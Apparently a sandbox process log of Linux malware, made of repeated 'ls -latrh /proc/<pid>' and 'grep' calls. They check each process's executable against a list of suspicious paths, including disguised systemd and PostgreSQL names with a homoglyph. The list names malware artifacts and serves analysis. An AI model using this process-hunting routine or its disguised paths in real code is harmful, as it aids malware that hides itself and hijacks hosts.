/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1038
-
-
/bin/grepgrep exe2⤵PID:1041
-
-
/bin/lsls -latrh /proc/7152⤵PID:1040
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1044
-
-
/bin/grepgrep exe2⤵PID:1048
-
-
/bin/lsls -latrh /proc/7162⤵PID:1047
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1050
-
-
/bin/grepgrep exe2⤵PID:1054
-
-
/bin/lsls -latrh /proc/722⤵PID:1053
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1059
-
-
/bin/grepgrep exe2⤵PID:1062
-
-
/bin/lsls -latrh /proc/7222⤵PID:1061
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1065
-
-
/bin/grepgrep exe2⤵PID:1070
-
-
/bin/lsls -latrh /proc/7392⤵
- Reads runtime system information
PID:1069
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1074
-
-
/bin/grepgrep exe2⤵PID:1078
-
-
/bin/lsls -latrh /proc/742⤵PID:1077
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1082
-
-
/bin/grepgrep exe2⤵PID:1086
-
-
/bin/lsls -latrh /proc/752⤵PID:1085
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1090
-
-
/bin/grepgrep exe2⤵PID:1093
-
-
/bin/lsls -latrh /proc/762⤵PID:1092
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1096
-
-
/bin/grepgrep exe2⤵PID:1099
-
-
/bin/lsls -latrh /proc/772⤵PID:1098
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1101
-
-
/bin/grepgrep exe2⤵PID:1104
-
-
/bin/lsls -latrh /proc/782⤵PID:1103
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1107
-
-
/bin/grepgrep exe2⤵PID:1110
-
-
/bin/lsls -latrh /proc/82⤵PID:1109
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1112
-
-
/bin/grepgrep exe2⤵PID:1115
-
-
/bin/lsls -latrh /proc/812⤵PID:1114
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1117
-
-
/bin/grepgrep exe2⤵PID:1120
-
-
/bin/lsls -latrh /proc/822⤵PID:1119
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1122
-
-
/bin/grepgrep exe2⤵PID:1125
-
-
/bin/lsls -latrh /proc/832⤵PID:1124
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1127
-
-
/bin/grepgrep exe2⤵PID:1130
-
-
/bin/lsls -latrh /proc/92⤵PID:1129
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1132
-
-
/bin/grepgrep exe2⤵PID:1135
-
-
/bin/lsls -latrh /proc/buddyinfo2⤵PID:1134
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1137
-
-
/bin/grepgrep exe2⤵PID:1140
-
-
/bin/lsls -latrh /proc/bus2⤵PID:1139
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1142
-
-
/bin/grepgrep exe2⤵PID:1145
-
-
/bin/lsls -latrh /proc/cgroups2⤵PID:1144
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1147
-
-
/bin/grepgrep exe2⤵PID:1150
-
-
/bin/lsls -latrh /proc/cmdline2⤵PID:1149
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1152
-
-
/bin/grepgrep exe2⤵PID:1155
-
-
/bin/lsls -latrh /proc/consoles2⤵PID:1154
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1157
-
-
/bin/grepgrep exe2⤵PID:1160
-
-
/bin/lsls -latrh /proc/cpuinfo2⤵PID:1159
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1162
-
-
/bin/grepgrep exe2⤵PID:1165
-
-
/bin/lsls -latrh /proc/crypto2⤵PID:1164
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1167
-
-
/bin/grepgrep exe2⤵PID:1170
-
-
/bin/lsls -latrh /proc/devices2⤵PID:1169
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1172
-
-
/bin/grepgrep exe2⤵PID:1175
-
-
/bin/lsls -latrh /proc/device-tree2⤵PID:1174
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1177
-
-
/bin/grepgrep exe2⤵PID:1180
-
-
/bin/lsls -latrh /proc/diskstats2⤵PID:1179
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1182
-
-
/bin/grepgrep exe2⤵PID:1185
-
-
/bin/lsls -latrh /proc/dma2⤵PID:1184
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1187
-
-
/bin/grepgrep exe2⤵PID:1190
-
-
/bin/lsls -latrh /proc/driver2⤵PID:1189
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1192
-
-
/bin/grepgrep exe2⤵PID:1195
-
-
/bin/lsls -latrh /proc/execdomains2⤵PID:1194
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1197
-
-
/bin/grepgrep exe2⤵PID:1200
-
-
/bin/lsls -latrh /proc/fb2⤵PID:1199
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1202
-
-
/bin/grepgrep exe2⤵PID:1205
-
-
/bin/lsls -latrh /proc/filesystems2⤵PID:1204
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1207
-
-
/bin/grepgrep exe2⤵PID:1210
-
-
/bin/lsls -latrh /proc/fs2⤵PID:1209
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1212
-
-
/bin/grepgrep exe2⤵PID:1215
-
-
/bin/lsls -latrh /proc/interrupts2⤵PID:1214
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1217
-
-
/bin/grepgrep exe2⤵PID:1220
-
-
/bin/lsls -latrh /proc/iomem2⤵PID:1219
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1222
-
-
/bin/grepgrep exe2⤵PID:1225
-
-
/bin/lsls -latrh /proc/ioports2⤵PID:1224
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1230
-
-
/bin/grepgrep exe2⤵PID:1233
-
-
/bin/lsls -latrh /proc/irq2⤵PID:1232
-
-
